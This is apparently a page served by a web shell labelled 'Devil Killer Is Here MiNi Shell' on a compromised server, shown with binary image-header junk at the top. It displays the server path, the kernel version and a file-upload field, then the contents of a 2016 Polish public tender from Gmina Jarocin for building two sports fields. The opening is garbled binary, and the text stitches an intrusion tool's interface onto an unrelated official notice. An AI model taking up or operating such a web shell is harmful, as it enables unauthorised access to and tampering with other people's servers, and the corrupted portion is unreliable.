JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160129/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160129/10681-N-2016.html

<p class="kh_header"><b>Jarocin: Modernizacja boisk na terenie Jarocina</b><br>
<b>Numer ogłoszenia: 10681 - 2016; data zamieszczenia: 29.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jarocin , Al. Niepodległości 10, 63-200 Jarocin, woj. wielkopolskie, tel. 62 7499500, faks 62 7472225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jarocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja boisk na terenie Jarocina.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa boiska wielofunkcyjnego przy ul. Dąbrowskiego w Jarocinie oraz budowa boiska wielofunkcyjnego na os. 1000 - lecia w Jarocinie.
Budowa boiska wielofunkcyjnego przy ulicy Dąbrowskiego w Jarocinie
1. NAWIERZCHNIA POLIURETANOWA
Projektuje się nawierzchnię poliuretanowo - gumową na warstwie podbudowy z kruszywa łamanego. W związku ze złą kondycją nawierzchni istniejącego boiska nie przewiduje się wykorzystania materiału do wbudowani a pod nową nawierzchnię. Po zdjęciu istniejącej nawierzchni oraz wykonaniu koryta do głębokości 20 - 25 cm, projektuje się wykonanie zagęszczenia mechanicznego macierzystego podłoża gruntowego. Na stropie tej warstwy wykonuje się podbudowę o miąższości 10 cm z warstwy kruszywa łamanego zawierającego frakcję w przedziale od 8 do 31.5 mm. Drugą warstwę podbudowy o miąższości 5 cm wykonuje się również z kruszywa łamanego, jednak kruszywo powinno zawierać frakcje od 0 do 8 mm. Kolejną z warstw jest samonośna warstwa podkładowa składająca się z mieszaniny granulatu gumowego ze żwirem i spojonego poliuretanem. Warstwa masy podkładowej gr. 3.5 cm układana zgodni e z zaleceniami producenta. Ostatnimi dwoma warstwami projektowanej nawierzchni jest 10 mm warstwa granulatu gumowego zespajana za pomocą natryskiwania mechanicznego 3 mm warstwy barwnego poliuretanu. Wokół nawierzchni boiska wielofunkcyjnego należy wy konać obrzeże z prefabrykatów betonowych o wymiarach 8 x 30 x 100 cm na ławie betonowej. Wykonana nawierzchnia powinna posiadać certyfikat lub deklarację zgodności z normą PN-EN 14877:2008, lub rekomendację techniczną ITB, lub wyniki badań specjalistycznego laboratorium potwierdzającego parametry oferowanej nawierzchni, lub dokument równoważny. Niezbędne jest przedstawienie karty technicznej oferowanej nawierzchni potwierdzonej przez producenta nawierzchni. Konieczne jest wykazanie posiadania przez oferowaną nawierzchnię atestu PZH. Wykonawca powinien przedstawić autoryzację producenta nawierzchni, wystawioną dla wykonawcy dla przedmiotowej inwestycji oraz potwierdzenie gwarancji na nawierzchnię przez producenta.
2. OZNAKOWANIE
Po wykonaniu nawierzchni poliuretanowej przewiduje się naniesienie metodą natryskową linii wyznaczających pola do gry dla następujących dyscyplin sportowych: siatkówka, koszykówka i piłka ręczna. W tym celu projektuje się użycie dwuskładnikowych farb poliuretanowych charakteryzujących się wysoką odpornością na zmienne warunki atmosferyczne, w tym niskie temperatury oraz promieniowanie UV. Oznakowanie powinno być w zgodzie z polskimi normami.
3. UTWARDZENIA
Wokół boiska wielofunkcyjnego projektuje się komunikację z kostki betonowej gr. 6 cm. Kostkę układać bezpośrednio na warstwie podsypki piaskowo - cementowej gr. 10 cm oraz warstwie odsączającej z piasku o miąższości warstwy 15 cm. Warstwa odsączająca wbudowana na stropie zagęszczonego mechanicznie gruntu macierzystego. Kostka betonowa w kolorze szarym, bądź czerwonym. Wokół nawierzchni komunikacji z kostki betonowej należy wykonać obrzeże z prefabrykatów betonowych o wymiarach 8 x 30 x 100 cm na ławie betonowej zgodnie z rysunkiem przekroju.
4. PIŁKOCHWYTY
W odległości 1,5 m od krawędzie nawierzchni poliuretanowej, wzdłuż krótszych boków boiska zlokalizowano piłkochwyty o wymiarach 10,0 x 6,0 m. Słupki wykonane z rury kwadratowej 80 x 3 mm malowane proszkowo w kolorze zielony mocować w stopach fundamentowych o wym. 40 x 40 x 80 cm. Wypełnienie piłkochwytów stanowić będzie siatka o wym. oczka 45 x 45 mm w kolorze zielonym, wykonana z polipropylenu w systemie bezwęzłowym o grubości sznurka 5 mm. Siatka rozpostarta będzie na lince stalowej gr. 4 mm w otulinie przezroczystej, mocowanej w poziomie co 0,5 m do słupków stalowych. Niezbędny zestaw montażowy stanowią zaciski do montowania siatki na lince oraz śruby rzymskie pozwalające na odpowiednie dopasowanie napięcia linki naciągowej.
5. OGRODZENIE
Powierzchnia o wymiarach 22,0 x 34,0 m, na którą składa się boisko wielofunkcyjne oraz komunikacja z kostki betonowej, ogrodzona zostanie siatką stalową o wys. 4,0 m. Słupki, wykonane z rury okrągłej 60 x 2,5 mm malowane proszkowo w kolorze zielonym, osadzone w stopach betonowych o wym. 40 x 40 x 80 cm. Wypełnienie stanowi siatka z drutu ocynkowanego powlekanego mrozoodpornym tworzywem PVC, oczka siatki 45 x 45 mm, średnica drutu 2,2 x 3,4 mm. Siatka ogrodzenia rozpięta na 8 rzędach drutu napinającego o średnicy 2,6 x 4,0 mm mocowanego za pomocą przelotek do słupów. Zwieńczeniem ogrodzenia jest rygiel poziomy usztywniający o średnicy 42 mm. W wyposażeniu ogrodzenia muszą się znaleźć dwie furtki o wymiarach 1,00 x 2, 00 m oraz brama o wym. 4,0 x 2,5 m. 
6. WYPOSAŻENIE DODATKOWE
Projektuje się wyposażenie wielofunkcyjnego boiska w elementy umożliwiające zgodne z projektowanym eksploatowanie przedmiotowego boiska. 
7. Przewiduje się dostawę i montaż bramki do gry w piłkę ręczną o wymiarach podanych na rysunku technicznym. Bramka osadzana w tulejach stalowych mocowanych do stóp betonowych. Kolor bramki biało - czerwony. Wymagana zgodność z przepisami do gry w piłkę ręczną oraz normą PN-EN 749-2006. Zaleca się również przedłożenie certyfikatu bezpieczeństwa wydanego przez Instytut Sportu. Projektuje się montaż dwóch bramek.
8. Przewiduje się dostawę i montaż stojaka do koszykówki dwusłupowego z możliwością regulacji w płaszczyźnie pionowej. Elementy stalowe cynkowane ogniowo. Wymagana zgodność z normą PN-EN 1270:2006 oraz posiadanie certyfikatu bezpieczeństwa wystawionego przez Instytut Nadzoru Technicznego. Projektuje się montaż dwóch stojaków w tulejach.
9. Projektuje się dostawę i montaż słupków do siatkówki z naciągiem wewnętrznym. Słupki wykonane ze wzmacnianego profilu aluminiowego, powierzchnia słupków anodowana. Naciąg ukryty wewnątrz słupka posiadać powinien regulację w zakresie 106 - 243 cm. Słupki nie powinny posiadać wystających elementów zewnętrznych. Projektuje się montaż dwóch słupków.
10. Projektuje się dostawę i montaż ławek z siedziskami sportowymi z tworzywa sztucznego. Siedziska przytwierdzone do stelaży stalowych ocynkowanych lub aluminiowych. Siedziska odporne na działanie zmiennych warunków atmosferycznych w tym niskich temperatur oraz promieniowania UV. Projektuje się dostawę trzech ławek, każda po 4 miejsca siedzące.
11. Projektuje się dostawę i montaż dwóch stojaków n a rowery, każdy na 6 rowerów. Konstrukcja stalowa ocynkowana bądź aluminiowa.
12. Projektuje się dostawę i montaż dwóch koszy na śmieci.

Budowa boiska wielofunkcyjnego na os. 1000 - lecia w Jarocinie

1. NAWIERZCHNIA POLIURETANOWA
Projektuje się nawierzchnię poliuretanowo - gumową na warstwie podbudowy z kruszywa łamanego. W związku z planowanym demontażem nawierzchni istniejącego boiska z kostki betonowej, nie przewiduje się wykorzystani a materiału do wbudowania pod nową nawierzchnię. Po zdjęciu istniejącej nawierzchni z kostki betonowej, usunięciu podbudowy pod istniejące utwardzenia oraz wykonaniu koryta do głębokości 20 - 25 cm, projektuje się wykonanie zagęszczenia mechanicznego macierzystego podłoża gruntowego. Na stropie tej warstwy wykonuje się podbudowę o miąższości 10 cm z warstwy kruszywa łamanego zawierającego frakcję w przedziale od 8 do 31.5 mm. Drugą warstwę podbudowy o miąższości 5 cm wykonuje się również z kruszywa łamanego, jednak kruszywo powinno zawierać frakcje od 0 do 8 mm. Kolejną z warstw jest samonośna warstwa podkładowa składająca się z mieszaniny granulatu gumowego ze żwirem i spojonego poliuretanem. Warstwa masy podkładowej gr. 3.5 cm układana zgodni e z zaleceniami producenta. Ostatnimi dwoma warstwami projektowanej nawierzchni jest 10 mm warstwa granulatu gumowego zespajana za pomocą natryskiwania mechanicznego 3 mm warstwy barwnego poliuretanu. Wokół nawierzchni boiska wielofunkcyjnego należy wy konać obrzeże z prefabrykatów betonowych o wymiarach 8 x 30 x 100 cm na ławie betonowej. Wykonana nawierzchnia powinna posiadać certyfikat lub deklarację zgodności z normą PN-EN 14877:2008, lub rekomendację techniczną ITB, lub wyniki badań specjalistycznego laboratorium potwierdzającego parametry oferowanej nawierzchni, lub dokument równoważny. Niezbędne jest przedstawienie karty technicznej oferowanej nawierzchni potwierdzonej przez producenta nawierzchni. Konieczne jest wykazanie posiadania przez oferowaną nawierzchnię atestu PZH. Wykonawca powinien przedstawić autoryzację producenta nawierzchni, wystawioną dla wykonawcy dla przedmiotowej inwestycji oraz potwierdzenie gwarancji na nawierzchnię przez producenta.
2. OZNAKOWANIE
Po wykonaniu nawierzchni poliuretanowej przewiduje się naniesienie metodą natryskową linii wyznaczających pola do gry dla następujących dyscyplin sportowych: siatkówka, koszykówka i piłka ręczna. W tym celu projektuje się użycie dwuskładnikowych farb poliuretanowych charakteryzujących się wysoką odpornością na zmienne warunki atmosferyczne, w tym niskie temperatury oraz promieniowanie UV. Oznakowanie powinno być w zgodzie z polskimi normami.
3. UTWARDZENIA
Wokół boiska wielofunkcyjnego projektuje się komunikację z kostki betonowej gr. 6 cm. Kostkę układać bezpośrednio na warstwie podsypki piaskowo - cementowej gr. 10 cm oraz warstwie odsączającej z piasku o miąższości warstwy 15 cm. Warstwa odsączająca wbudowana na stropie zagęszczonego mechanicznie gruntu macierzystego. Kostka betonowa w kolorze szarym, bądź czerwonym. Wokół nawierzchni komunikacji z kostki betonowej należy wykonać obrzeże z prefabrykatów betonowych o wymiarach 8 x 30 x 100 cm na ławie betonowej zgodnie z rysunkiem przekroju. Utwardzeni a o takich samych warstwach podbudowy wykonuje się pod stoły do gry w szachy, p od stół do ping ponga oraz pod przenoszone z działki 496/126 urządzenia fitness.
4. PIŁKOCHWYTY
Wykorzystuje się istniejące piłkochwyty, montowane zgodnie z planem zagospodarowania 0,5 m od projektowanego ogrodzenia boiska wielofunkcyjnego.
5. URZĄDZENIA ZABAWOWE
Wykorzystuje się istniejące urządzenia zabawowe: huśtawka ważka bez oparcia, huśtawka podwójna oraz piaskownica drewniana. W wyniku inwestycji huśtawki zostają na swoich miejscach, jedynie piaskownica zostanie przybliżona w kierunku huśtawki podwójnej na odległość 2,16 m.
6. URZĄDZENIA FITNESS
Projektuje się montaż czterech kompletów urządzeń fitness przeniesionych z działki nr 496/126:
- wioślarz + prasa,
- podciąg nóg + wahadło,
- drabinka + wyciskanie siedząc,
- orbitrek + ławka,
Urządzenia montowane zgodnie z zaleceniami producenta, nawierzchnia z kostki betonowej.
7. STÓŁ DO PING PONGA
Wykorzystuje się istniejący stół do ping ponga. W wyniku inwestycji zmieni się jednak jego lokalizacja - zgodnie z planem zagospodarowania działki.
8. STÓŁ DO GRY W SZACHY
Projektuje się dwa betonowe stoły do gry w szachy. Stoły kotwić do stóp betonowych o wym. 30 x 30 x 80 cm. Blat stołu szlifowany, pola gier wykonane z gresowych płytek mrozoodpornych, boki blatu zabezpieczone aluminiowym kątownikiem. Powierzchnia płyty blatu pokryta lakierem zabezpieczającym powierzchni ę przed szkodliwym działaniem czynników atmosferycznych. Siedziska drewniane, malowane i zabezpieczone lakierem przed działaniem czynników atmosferycznych, szczególnie zmiennych temperatur oraz promieniowania UV.
9. OGRODZENIE
Powierzchnia o wymiarach 22,0 x 34,0 m, na którą składa się boisko wielofunkcyjne oraz komunikacja z kostki betonowej, ogrodzona zostanie siatką stalową o wys. 4,0 m. Słupki, wykonane z rury okrągłej 60 x 2,5 mm malowane proszkowo w kolorze zielonym, osadzone w stopach betonowych o wym. 40 x 40 x 80 cm. Wypełnienie stanowi siatka z drutu ocynkowanego powlekanego mrozoodpornym tworzywem PVC, oczka siatki 45 x 45 mm, średnica drutu 2,2 x 3,4 mm. Siatka ogrodzenia rozpięta na 8 rzędach drutu napinającego o średnicy 2,6 x 4,0 mm mocowanego za pomocą przelotek do słupów. Zwieńczeniem ogrodzenia jest rygiel poziomy usztywniający o średnicy 42 mm. W wyposażeniu ogrodzenia muszą się znaleźć dwie furtki o wymiarach 1,00 x 2,00 m oraz brama o wym. 4,0 x 2,5 m.
10. WYPOSAŻENIE DODATKOWE
Projektuje się wyposażenie wielofunkcyjnego boiska w elementy umożliwiające zgodne z projektowanym eksploatowanie przedmiotowego boiska.
11. Przewiduje się dostawę i montaż bramki do gry w piłkę ręczną o wymiarach podanych na rysunku technicznym. Bramka osadzana w tulejach stalowych mocowanych do stóp betonowych. Kolor bramki biało - czerwony. Wymagana zgodność z przepisami do gry w piłkę ręczną oraz normą PN-EN 749-2006. Zaleca się również przedłożenie certyfikatu bezpieczeństwa wydanego przez Instytut Sportu. Projektuje się montaż dwóch bramek.
12. Przewiduje się ponowny montaż stojaka do koszykówki dwusłupowego z możliwością regulacji w płaszczyźnie pionowej. Elementy stalowe cynkowane ogniowo. Wymagana zgodność z normą PN-EN 1270:2006 oraz posiadanie certyfikatu bezpieczeństwa wystawionego przez Instytut Nadzoru Technicznego. Projektuje się montaż dwóch stojaków w tulejach. 
13. Projektuje się dostawę i montaż słupków do siatkówki z naciągiem wewnętrznym. Słupki wykonane ze wzmacnianego profilu aluminiowego, powierzchnia słupków anodowana. Naciąg ukryty wewnątrz słupka posiadać powinien regulację w zakresie 106 - 243 cm. Słupki nie powinny posiadać wystających elementów zewnętrznych. Projektuje się montaż dwóch słupków.
14. Projektuje się dostawę i montaż ławek betonowych z drewnianym siedziskiem, bez oparcia. Siedzisko wykonane z desek drewna iglastego zabezpieczonego lakierobejcą. Siedziska odporne na działanie zmiennych warunków atmosferycznych w tym niskich temperatur oraz promieniowania UV. Projektuje się dostawę dwóch ławek.
15. Projektuje się dostawę i montaż dwóch stojaków na rowery, każdy na 6 rowerów. Konstrukcja stalowa ocynkowana bądź aluminiowa.
16. Projektuje się dostawę i montaż dwóch koszy na śmieci.
Ilekroć w niniejszej SIWZ lub w jakichkolwiek dokumentach stanowiących załączniki do niniejszej SIWZ (m.in. dokumentacji technicznej, SST, kosztorysie ofertowym, itp.) przedmiot zamówienia został opisany przez wskazanie znaków towarowych, patentów lub pochodzenia, w takim przypadku w/w wskazania traktować należy, jako podane przykładowo, a Zamawiający dopuszcza zastosowanie rozwiązań równoważnych o parametrach nie gorszych niż opisane w dokumentacji przetargowej.
Ilekroć w niniejszej SIWZ lub w jakichkolwiek dokumentach stanowiących załączniki do niniejszej SIWZ (m.in. dokumentacji technicznej, SST, kosztorysie ofertowym, itp.) przedmiot zamówienia został opisany za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 
ust. 1 - 3 Pzp Zamawiający dopuszcza rozwiązania równoważne o parametrach nie gorszych niż opisane w dokumentacji przetargowej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.23.24.51-8, 45.34.00.00-2, 45.34.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.05.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wysokość wadium (przepisy art. 45. PZP).
 Zamawiający ustalił wysokość wadium w kwocie 9.000,00 zł (słownie: dziewięć tysięcy złotych, 00/100). Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
2.	Forma wadium.
Wadium może być wniesione w następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja ma być, co najmniej gwarancją nieodwołalną i płatną na pierwsze pisemne żądanie Zamawiającego.
3.	Miejsce i sposób wniesienia wadium:
3.1	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy na nr konta: 91 1090 1131 0000 0000 1300 1942 z dopiskiem Wadium w przetargu nieograniczonym na Modernizację boisk na terenie Jarocina.
3.2	Zamawiający, wymaga by wadium wnoszone w innych formach niż 
w pieniądzu, a dopuszczonych do wniesienia zgodnie z ustawą Pzp, było złożone w oryginale w siedzibie Zamawiającego, pok. nr 57 - przed upływem terminu składania ofert. Złożenie oryginału dokumentu potwierdzającego wniesienie wadium w innych formach niż pieniądz, o którym mowa 
w niniejszym punkcie jest wymagane jako warunek konieczny.
3.3	Zaleca się, by do oferty dołączyć kopię dokumentu potwierdzającego wniesienie wadium, tzn. potwierdzoną przez Wykonawcę za zgodność 
z oryginałem, kopię polecenia przelewu na konto Zamawiającego lub potwierdzoną przez Wykonawcę za zgodność z oryginałem, kopię dokumentu będącego każdą inną formą wadium dopuszczoną przez Zamawiającego.
Załączenie w/w kopii do oferty, o których mowa w niniejszym punkcie jest pożądane, lecz nie jest to warunek konieczny.
4.	Termin wniesienia wadium
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.
5.	Zwrot wadium
5.1.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, 
z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
5.2.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
5.3.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
5.4.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium w przypadku, o którym mowa w ppkt 1, jeżeli 
w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
5.5.	W pozostałych sprawach dotyczących zwrotu wadium, nieuregulowanych 
w niniejszym dziale SIWZ, mają zastosowanie przepisy ustawy Pzp.
6.	Utrata wadium
6.1.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji 
o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
6.2.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać się doświadczeniem w wykonaniu (zakończeniu) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, 
co najmniej 1 robotą polegającą na budowie boiska sportowego o nawierzchni poliuretanowej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca dysponuje 
lub będzie dysponował osobą do pełnienia funkcji kierownika budowy - kierownik branży budowlanej z uprawnieniami bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
